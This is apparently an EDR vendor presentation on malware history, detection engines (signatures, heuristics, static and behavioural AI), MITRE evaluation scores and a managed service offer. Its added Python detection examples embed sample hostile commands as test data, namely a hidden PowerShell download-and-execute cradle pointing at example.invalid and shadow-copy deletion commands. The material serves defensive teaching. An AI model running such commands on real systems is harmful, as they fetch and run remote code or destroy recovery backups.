
Demystifying

Endpoint Detection
and Response
A deep dive into Endpoint Protection
Systems and their key capabilities

Paul Jack – 02-12-21


Paul Jack
• Cyber Security Lead Engineer
• 17 years' experience with Sec-1 (Claranet Cyber Security)
• Background: implementing cyber security solutions
• Mainly covering SIEM / EDR / Firewall / BAS / MFA
Agenda

• The evolution of malware


• High profile security breaches
• Endpoint technology definitions
• Malware detection: Capabilities
• Evaluating EDR solutions
• Live ransomware demo
• Our chosen EDR partner & EDR services
Endpoint Detection and Response

Key Security Threats
Threat Evolution - Key dates
• 1986 – First computer virus written for an IBM PC
• 1987 – AV software available
• 1989 – Birth of ransomware (AIDS Trojan)
• 2000 – Love Letter virus (proof of concept for social engineering)
• 2001 – Code Red: 1st fileless malware
• 2003 – SQL Slammer: fileless malware payload delivery
• 2008 – Bitcoin introduced (game changer)
• 2013 – CryptoLocker: the term ransomware becomes a household name
• 2016 – Locky (ransomware, healthcare US)
• 2017 – WannaCry (ransomware, healthcare UK)
• 2017 – Huge data breach (fileless malware)
• 2021 – Ransomware as a service
  - Subscription services available (Dark Web)
  - Affiliate programs: creators gain a % of paid ransoms as commission
  - Open RaaS, closed RaaS, lone wolves
  - Ransomware + data leak bundled
  - Largest ransom ever paid: CNA Financial, $40m
  - Supply chain attacks
Supply Chain attacks

Supply Chain
SolarWinds Orion attack highlights the difficulty of defending against supply chain attacks.
First reported in December 2020.
Diagram: the attacker gains backdoor access to the third-party vendor; the trusted data flow from the vendor carries the compromise into the target organisation.

Hafnium
Feb 2021
Threat Evolution - Fileless Malware
Diagram: general fileless malware example.

• 149 million records of Americans
• 15.2 million records of British citizens
• 19,000 Canadian records
• One of the largest personal record thefts
• Attack method used: fileless malware
• Result: data exfiltration
• Vulnerable system: Apache server (Apache Struts 2 vulnerability, CVE-2017-5638, used to remotely execute commands via a crafted Content-Type header; no file needs to be dropped on disk)
Ransomware (last 12 months)
• Scottish Environment Protection Agency, SEPA (24/12/2020)
  - Cyber security response playbooks were encrypted
  - CEO advised recovery of IT systems could take 24 months
  - Punishment: commercial data published to the dark web (including details of private staff grievances)
• Colonial Pipeline company (07/05/2021)
  - US East Coast
  - Billing system was compromised
  - Led to the panic buying of fuel
  - Fuel shortage; planes had to divert to refuel
Typical recovery scenarios
Prevent further propagation
• Isolate the device / disconnect it from the network

Recovery process
• Pay the ransom (no guarantee the decryptor works, and bundled data leaks mean the data may already be gone)
• Reinstall the device
• Restore using a 3rd-party system (outside of the EPP)
• KB article – manual clean-up
• Ransomware decryption tools (not guaranteed, no ETA)

Investigation
• Root cause analysis / data
Threat landscape stats
Ransomware stats
• In 2021 the average ransom demand was $5.3m, up 518%
• The average ransom paid by victims was $570,000, up 82%
• The average amount of downtime a company experiences after a ransomware attack is 21 days
• Ransomware attacks increased by 151% so far in 2021, with even higher levels expected in 2022 (due to RaaS providing a lower barrier to entry)

General breach stats
• 4 in every 10 businesses have reported a cyber breach in the last 12 months (40%)
• In medium sized businesses this is 65%
• In large businesses this is 64%
• Attacks leveraging PowerShell grew by 208%
• Attacks leveraging MS Office grew by 199%
Endpoint Detection and Response

Endpoint technology definitions
Endpoint technology definitions (& Next Gen)

EPP – Endpoint Protection
• Closest to traditional legacy AV
• Relied on signatures, sandboxing & lookup technology: detect it, kill it
• Lack of telemetry / no investigation possible

EDR (Wave 1)
• Flight recorder: collects telemetry metadata
• "We give you the info, you decide if the event is bad"
• Too much data to analyse – analyst fatigue

EDR (Wave 2)
• Convergence of EPP and EDR
• Increased efficacy / upgraded detection engines
• Auto-remediates threats it detects
• Provides all the metadata (unstructured)

Active EDR
• Joined-up and contextual metadata leading to intelligent decision making

Active EDR Advanced
• Joined-up contextual metadata available to analysts via threat hunting

XDR – Extended Detection & Response
• As above, providing coverage of both endpoints and network devices (MDR + EDR)
Endpoint Detection and Response

Active EDR – Real world example

Active EDR – Theory in the real world
Event 1
PERSON 1 parks a car outside the Hatton Garden safety deposit building and sits there for an hour
Event 2
PERSON 2 arrives by bus, walks around the perimeter of the building and takes some photos
Event 3
PERSON 3, "an alarms expert", downloads the specs & design documents for the building's alarm system
Event 4
They all meet up together for a pint in a local pub

Active EDR – Theory in the cyber world
Event 1
Open a spreadsheet containing a macro
Event 2
Enable macros to update a currency exchange rate
Event 3
Macro launches PowerShell
Event 4
PowerShell downloads and executes a payload in memory

Context is key!
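The cyber-world chain above is exactly what a behavioural engine has to reason about: opening a spreadsheet, enabling a macro and launching PowerShell are each ordinary on their own. The Python below is an added example (not from this deck and not any vendor's product code) that correlates constructed process telemetry into a storyline and alerts only when a script host descends from an Office process and then both reaches the network and executes code in memory. The event schema, field names, process images and the sample events are all constructed for the example.

```python
"""Added example (not from the deck or any vendor): correlate individually
benign process events into a malicious storyline. The event format and the
sample telemetry are constructed for this example, not a real EDR schema."""
from collections import defaultdict

# Office applications that legitimately run macros but should not spawn script hosts.
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def build_process_table(events):
    """Index process_start events by pid so parent chains can be walked."""
    return {ev["pid"]: ev for ev in events if ev["type"] == "process_start"}


def ancestry(procs, pid):
    """Return [process, parent, grandparent, ...] (child first), stopping at
    unknown parents or cycles."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid])
        pid = procs[pid]["ppid"]
    return chain


def detect_macro_to_memory(events):
    """Alert on script hosts that descend (directly or indirectly) from an Office
    app and then both connect to the network and execute code in memory."""
    procs = build_process_table(events)
    side_effects = defaultdict(set)  # pid -> {"network_connect", "memory_exec"}
    for ev in events:
        if ev["type"] in ("network_connect", "memory_exec"):
            side_effects[ev["pid"]].add(ev["type"])
    alerts = []
    for pid, proc in procs.items():
        if proc["image"].lower() not in SCRIPT_HOSTS:
            continue
        chain = ancestry(procs, pid)
        office_parent = next((p for p in chain[1:] if p["image"].lower() in OFFICE_APPS), None)
        if office_parent is None:
            continue  # e.g. an admin launching PowerShell from explorer.exe
        if {"network_connect", "memory_exec"} <= side_effects[pid]:
            alerts.append({
                "pid": pid,
                "storyline": [p["image"] for p in reversed(chain)],  # root -> child
                "origin": office_parent["image"],
                "evidence": sorted(side_effects[pid]),
            })
    return alerts


# Constructed telemetry: the deck's four events, plus an admin running the same
# PowerShell command from the desktop, which must NOT trigger this rule.
CRADLE = "IEX(New-Object Net.WebClient).DownloadString('http://example.invalid/p')"
SAMPLE_EVENTS = [
    {"type": "process_start", "pid": 100, "ppid": 1, "image": "explorer.exe"},
    {"type": "process_start", "pid": 200, "ppid": 100, "image": "EXCEL.EXE",
     "cmdline": "EXCEL.EXE fx_rates.xlsm"},                                  # Event 1
    {"type": "macro_enabled", "pid": 200, "detail": "UpdateExchangeRate"},    # Event 2
    {"type": "process_start", "pid": 300, "ppid": 200, "image": "powershell.exe",
     "cmdline": "powershell -w hidden -nop -c " + CRADLE},                     # Event 3
    {"type": "network_connect", "pid": 300, "dest": "example.invalid:80"},   # Event 4
    {"type": "memory_exec", "pid": 300, "detail": "script block run from memory"},
    # Same tooling, launched interactively by an admin: no Office ancestor.
    {"type": "process_start", "pid": 400, "ppid": 100, "image": "powershell.exe",
     "cmdline": "powershell -c " + CRADLE},
    {"type": "network_connect", "pid": 400, "dest": "example.invalid:80"},
    {"type": "memory_exec", "pid": 400, "detail": "script block run from memory"},
]

if __name__ == "__main__":
    for alert in detect_macro_to_memory(SAMPLE_EVENTS):
        print(" -> ".join(alert["storyline"]), alert["evidence"])
```

Only pid 300 alerts, with the full storyline explorer.exe -> EXCEL.EXE -> powershell.exe. The admin's PowerShell (pid 400) runs the same download cradle but has no Office ancestor, so this rule stays quiet; the cradle itself would still deserve a separate, lower-severity detection.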
Endpoint Detection and Response

Product selection & evaluation
Selecting an Endpoint Solution

Meeting an auditor's minimum requirements


Detection methods – Engines (Legacy)

Signatures
• Prevention technique: match a file hash / identifier
• Mitigation coverage: known malware (the strain must have been identified previously)
• Weakness: unknown or zero-day malware; polymorphism / APTs / fileless malware; requires constant updates

Application whitelisting
• Prevention technique: allows execution of pre-approved applications only
• Mitigation coverage: prevents execution of untrusted apps
• Weakness: whitelisted apps can be exploited and used for malicious activities (living off the land: a trusted interpreter running attacker-supplied script)

Sandboxing
• Prevention technique: execute in a virtual environment; speeds up analysis time
• Mitigation coverage: evasive, stealthy APTs; polymorphic malware (behavioural)
• Weakness: mitigation delays (not practical for live web access; works well with email systems); sandbox-aware samples can stay dormant until they detect a real host

Third-party threat intel / cloud lookups
• Prevention technique: match pre-analysed and documented malware; data from a wider array of vendors / security researchers (e.g. VirusTotal)
• Mitigation coverage: known malware; unsophisticated zero-day malware if the lookup includes heuristic checks (anomalies)
• Weakness: delays in taking appropriate actions; must have been analysed previously; requires an internet connection to look up

Heuristics
• Prevention technique: checks for abnormalities within a file based on best practices (e.g. is it digitally signed by the vendor?)
• Mitigation coverage: detects malware containing obvious abnormalities in its file structure
• Weakness: prone to false positives; requires the support of other detection engines
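To make the weakness column concrete, the Python below is an added example (not from the deck and not any vendor's engine) showing a hash signature hit, the miss that follows a one-byte change to the same file, and an entropy heuristic that flags a packed payload but also a legitimate encrypted backup. The samples, the signature set and the 7.2-bit threshold are all constructed for illustration.

```python
"""Added example (not from the deck or any vendor): a hash signature lookup,
the miss that follows a one-byte change to the same file, and an entropy
heuristic that flags packed payloads but also legitimate encrypted data.
Samples, signature set and threshold are constructed for this example."""
import hashlib
import math
import random

# Constructed "known strain" and the signature database built from it.
KNOWN_MALWARE = b"MZ" + b"\x90" * 64 + b"cmd.exe /c vssadmin delete shadows /all /quiet"
SIGNATURES = {hashlib.sha256(KNOWN_MALWARE).hexdigest()}


def signature_match(data: bytes, signatures: set) -> bool:
    """Legacy engine: exact SHA-256 match against previously analysed strains."""
    return hashlib.sha256(data).hexdigest() in signatures


def polymorph(data: bytes) -> bytes:
    """Minimal 'repack': change one padding byte. The sample behaves exactly
    as before, but every hash signature for the original now misses."""
    return data[:10] + b"\x91" + data[11:]


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant stream, close to 8.0 for random data."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


ENTROPY_THRESHOLD = 7.2  # constructed cut-off; real engines tune it per file type/section


def heuristic_flag(data: bytes) -> bool:
    """Heuristic engine: packed or encrypted bodies look like random bytes."""
    return shannon_entropy(data) > ENTROPY_THRESHOLD


def _random_bytes(seed: int, n: int) -> bytes:
    """Deterministic stand-in for a packed/encrypted body."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(n))


# Constructed inputs: a packed malware body, a legitimate encrypted backup
# archive, and a plain unpacked binary.
PACKED_PAYLOAD = b"MZ" + _random_bytes(1, 4096)
ENCRYPTED_BACKUP = b"BKP1" + _random_bytes(2, 4096)
PLAIN_BINARY = b"MZ" + b"plain text section " * 200

if __name__ == "__main__":
    print("signature hit on known strain:", signature_match(KNOWN_MALWARE, SIGNATURES))
    print("signature hit after 1-byte change:", signature_match(polymorph(KNOWN_MALWARE), SIGNATURES))
    for name, blob in [("packed payload", PACKED_PAYLOAD),
                       ("encrypted backup", ENCRYPTED_BACKUP),
                       ("plain binary", PLAIN_BINARY)]:
        print(f"{name}: entropy={shannon_entropy(blob):.2f} flagged={heuristic_flag(blob)}")
```

The signature engine is exact and cheap but only knows the one strain it has a hash for; the heuristic cannot tell the packed payload from the encrypted backup, which is the false-positive cost the table lists, and why neither engine is used on its own.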
Detection / AI-ML Models (Next-Gen)
Diagram, building up a model: malicious files and benign files -> extract features -> train model -> model.
Diagram, running the model: unknown file -> extract features -> model -> malicious or benign.
Detection / Static AI (Next-Gen)
Decision Tree (Random Forest ML model)
Diagram: a cat-vs-dog decision tree built on static (observable without execution) features. The root asks "Has 4 legs?"; the true branch continues with "Has sharp claws?", the false branch with "Has wings?", with further splits on "lower than 100m", "increased olfactory receptors" and "balance". Each leaf gives class probabilities rather than a yes/no, e.g. Dog 1% / Cat 99%, Dog 70% / Cat 30%, Dog 90% / Cat 10%, Dog 0% / Cat 0%.
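The "extract features, train model, run model" pipeline and the decision tree above, as an added example in plain Python (not the deck's or any vendor's model). The feature definitions, the labelled corpus and the leave-one-out forest construction are constructed for the example; a real random forest uses bootstrap resampling and random feature subsets over thousands of features and millions of labelled files.

```python
"""Added example (not from the deck or any vendor): the 'extract features ->
train model -> run model' pipeline as a small forest of decision trees in plain
Python. Feature definitions, the labelled corpus and the leave-one-out forest
construction are all constructed for this example."""


def extract_features(data: bytes) -> dict:
    """Static features: derived from the bytes on disk, nothing is executed."""
    printable = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    text = data.lower()
    return {
        "pe_header": data[:2] == b"MZ",
        "mostly_binary": printable / max(len(data), 1) < 0.6,
        "shadow_copy_deletion": b"vssadmin" in text or b"shadowcopy" in text,
        "script_download": b"downloadstring" in text or b"invoke-webrequest" in text,
        "vendor_signature": b"signed:trusted-vendor" in text,  # stand-in for a real Authenticode check
    }


def gini(rows) -> float:
    """Impurity of a set of (features, label) rows; 0 means all one class."""
    p = sum(label for _, label in rows) / len(rows)
    return 2 * p * (1 - p)


def build_tree(rows, depth=0, max_depth=3):
    """Greedy split on the boolean feature that lowers weighted Gini the most.
    Leaves hold P(malicious), like the percentages on the deck's tree diagrams."""
    labels = [label for _, label in rows]
    if depth == max_depth or len(set(labels)) == 1:
        return {"leaf": sum(labels) / len(labels)}
    best = None
    for feature in rows[0][0]:
        yes = [r for r in rows if r[0][feature]]
        no = [r for r in rows if not r[0][feature]]
        if not yes or not no:
            continue  # this feature separates nothing at this node
        score = (len(yes) * gini(yes) + len(no) * gini(no)) / len(rows)
        if best is None or score < best[0]:
            best = (score, feature, yes, no)
    if best is None:
        return {"leaf": sum(labels) / len(labels)}
    _, feature, yes, no = best
    return {"feature": feature,
            "true": build_tree(yes, depth + 1, max_depth),
            "false": build_tree(no, depth + 1, max_depth)}


def predict_tree(tree, feats) -> float:
    while "leaf" not in tree:
        tree = tree["true"] if feats[tree["feature"]] else tree["false"]
    return tree["leaf"]


def train_forest(rows):
    """One tree per leave-one-out subset of the corpus. A real random forest
    uses bootstrap resampling and random feature subsets instead; this
    deterministic variant keeps the example reproducible."""
    return [build_tree(rows[:i] + rows[i + 1:]) for i in range(len(rows))]


def predict_forest(forest, data: bytes) -> float:
    """Run the model: average P(malicious) over all trees."""
    feats = extract_features(data)
    return sum(predict_tree(t, feats) for t in forest) / len(forest)


# Constructed labelled corpus (label 1 = malicious, 0 = benign).
BIN = bytes(range(256)) * 4  # filler that looks like compiled code
TRAINING = [
    (b"MZ" + BIN + b"vssadmin delete shadows /all", 1),
    (b"MZ" + BIN + b"powershell IEX DownloadString", 1),
    (b"MZ" + BIN + b"wmic shadowcopy delete", 1),
    (b"' dropper\r\nInvoke-WebRequest http://example.invalid/x\r\n", 1),
    (b"MZ" + BIN + b"signed:trusted-vendor installer", 0),
    (b"MZ" + BIN + b"signed:trusted-vendor updater", 0),
    (b"# build script\r\necho done\r\n", 0),
    (b"Quarterly report: revenue up 3%\r\n" * 8, 0),
]
FOREST = train_forest([(extract_features(d), label) for d, label in TRAINING])

# Unseen samples to run through the model.
NEW_MALICIOUS = b"MZ" + BIN + b"cmd /c vssadmin delete shadows"
NEW_BENIGN = b"MZ" + BIN + b"signed:trusted-vendor driver"
PACKED_NO_STRINGS = b"MZ" + BIN  # strings packed away: static features cannot see them


def verdict(data: bytes, threshold=0.5) -> str:
    return "malicious" if predict_forest(FOREST, data) >= threshold else "benign"


if __name__ == "__main__":
    for name, sample in [("new malicious", NEW_MALICIOUS), ("new benign", NEW_BENIGN),
                         ("packed, no strings", PACKED_NO_STRINGS)]:
        print(f"{name}: P(malicious)={predict_forest(FOREST, sample):.2f} -> {verdict(sample)}")
```

With this corpus the forest scores NEW_MALICIOUS at 1.0 and NEW_BENIGN at 0.0, but PACKED_NO_STRINGS, the same PE with its tell-tale strings hidden, drops to 0.25 and is passed as benign: that is the static-AI weakness listed on the next slide, and why a behavioural engine also watches what the file does once it runs.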
Detection / Behavioural AI (Next-Gen)
Decision Tree (Random Forest ML model)
Diagram: the same cat-vs-dog classification built on behavioural (observed at run time) features instead. The root asks "Loves you?"; later splits are "Finds objects through sense of smell?", "Bites you?", "Attacks without warning?", "Enjoys walks with you?" and "Falls asleep in odd places?". Leaves again give class probabilities, e.g. Dog 2% / Cat 98%, Dog 70% / Cat 30%, Dog 99% / Cat 1%, Dog 40% / Cat 60%, Dog 3% / Cat 97%, Dog 8% / Cat 92%, Dog 46% / Cat 54%.
Static AI / Behavioural AI (Next-Gen)

Static AI
• Key advantage: outcome is determined pre-execution
• Key disadvantages: doesn't reliably determine behaviour; doesn't detect what happens in memory; less likely to detect novel and zero-day threats; easier for an attacker to develop counter-measures (easier to change a file's structure than its behaviour)

Behavioural AI
• Key advantages: provides coverage of more dynamic attacks, including living off the land attacks, fileless malware, ransomware, zero-day malware and APTs, lateral movement / scripts, local CLI and active content, memory exploitation / privilege escalation / errant system manipulation / registry operations / kernel operations / stealth, spying / anti-detection / network activity, persistence, anti-debugging, data collection, file operations and manipulations, process operations
• Key disadvantages: enabled post-execution (the threat has already started running before it can be judged); no human intelligence applied to its decision making
Detection Methods / Visibility (Next-Gen)

Visibility methods
• On-disk write: only analyses files written to disk (can't see memory-based script and file execution)
• Process injection (the agent instruments running processes): provides the ability to see all process activity, even that executed in memory, as well as files written to disk (provides visibility of fileless attacks); linked process metadata can be extracted for analysis

Active EDR Advanced (threat hunting capabilities)
• Provides an interface for analysts to pivot around telemetry data from a device to conduct in-depth investigations
• Supports analyst-driven intelligence to discover threats legacy detection engines & AI models can't, including living off the land attacks
• Contextual and linked metadata provided via the GUI for incident response and root cause analysis investigations
Other considerations

Consideration Question to ask

• Implementation and configuration changes • Will the product require lots of config changes to perform to its full capability?

• Agent Autonomy • Does the product have the ability to perform as well and at machine speed when offline?

• Remediation and recovery options • Can the endpoint solution isolate an infected device from the network to prevent spread?
• Does the product provide full remediation of an attack storyline (Everything the attacker touched – Undone)
• What about a successful ransomware attack - Can the Endpoint solution perform a full recovery for you quickly
and with no input from 3rd party systems
• System Support • Do you need a separate solution to cover other systems in your estate?
- Remote workers
- Servers
- Cloud environments
- Dev environments (Docker, Kubernetes, Amazon EKS etc.)
Gartner Magic Quadrant Leader
MITRE ATT&CK

https://attackevals.mitre-engenuity.org/enterprise/carbanak_fin7/
Endpoint Detection and Response

Our chosen EDR vendor
Visibility (Mitre ATT&CK results)

Vendors of note Visibility score

Sentinel One 100%


CrowdStrike 87%
Microsoft 87%
Sophos 68%
Delayed Detections (Mitre ATT&CK results)

Vendors of note – Delayed detections
Sentinel One 0
Sophos 0
Microsoft 1
CrowdStrike 15
Configuration changes (Mitre ATT&CK results)

Vendors – Configuration changes

Sentinel One 0
Sophos 6
CrowdStrike 25
Microsoft 35
Analytic Detection Coverage (Mitre ATT&CK results)

Vendors of note – Analytic detection coverage
Sentinel One 159/174
Microsoft 134/174
CrowdStrike 64/174
Sophos 39/174
Storyline Tracking
Detection Engines (Mitre ATT&CK results)

• Reputation Engine
• Static AI “Malicious”
• Static AI “Suspicious”
• Static AI - Executables
• Static AI - Potentially Unwanted Apps
• Behavioural AI – Executables
• Behavioural AI - Documents, Scripts
• Behavioural AI - Lateral Movement
• Behavioural AI - Anti-Exploitation / File-less
• Application control (Containerised workloads)
• Detect Interactive Threats (Insider Threats)
SentinelOne technology overview
MITRE ATT&CK & Gartner Leader
Sentinel One - System architecture
Diagram: three endpoints, each with the endpoint software installed.
Endpoint Detection and Response

Live Ransomware Demo
Recover encrypted files in minutes!
EDR Management Challenges
Time
• To review all suspicious alerts (next-gen EDR / metadata)

Skills
• Required cyber security skills and certifications
• Perform the investigations properly
• Make the correct response decisions & recovery actions
• Conduct analyst-driven threat hunting activities

Budget & Resources
• To finance a suitably sized, skilled and available team
• To provide 24/7 response actions 365 days a year
Managed EDR Overview
Diagram of the service loop:
• The endpoint agent monitors for threats using behavioural AI and static analysis (next-gen AV)
• Abnormalities are raised as an alarm
• All alarms are triaged by a security analyst in the Security Operations Centre
• Continuous tuning activities
• We act: KILL, QUARANTINE, REMEDIATE, ROLLBACK
• Security events are managed and reported through a customer management portal
• Analyst-driven threat hunting activities
• Quarterly service reviews
• Monthly security reports
Service SLAs & response model
• P1 Critical: notification within 15 minutes, response within 15 minutes
• P2 High: notification within 30 minutes, response within 30 minutes
• P3 Medium: notification within 2 hours, response within 2 hours
• P4 Low: notification within 4 hours, response within 4 hours
Claranet Online
SOC Team - Threat Hunting
• Abnormal behaviour on multiple servers (Exchange, DCs)
• Current AV didn't detect anything suspicious
• Sentinel One found multiple malicious files on customer systems
• Further abnormal connections detected
• SOC used Deep Visibility metadata to pinpoint the connection source
• Legitimate vendor tools had been installed in a temp directory
• Although the tools were legitimate, the config file had been modified
• Off the back of the Hafnium vulnerability the attacker had managed to download the 2 legitimate tools to the temp directory
• Legitimate program: AI modelling + other engines were unable to detect that the activity was malicious
• The software's purpose was to provide RDP access for use by system admins
• However, the modified config file port-forwarded the RDP session outbound, advertising the connection URL to the attacker

Deep Visibility provided the tools & the detailed metadata for the SOC team to identify and nullify this threat.
EDR Service offering

EDR as a Service
• Licensed software
• Installation & configuration
• Technical product support
• Claranet Online portal access

Managed EDR
• EDR event analysis
• EDR incident handling
• 24/7 EDR analysis (out of hours)
• Remediation / rollback
• Policy tuning, exclusions, reduction of false positives
• Threat intelligence (analyst driven)
• Threat hunting activities
• Monthly security report

Managed EDR + MDR: Managed XDR


For more information
about Endpoint Detection
and Response
Call us to arrange your free POC:

+44 (0)330 390 0504
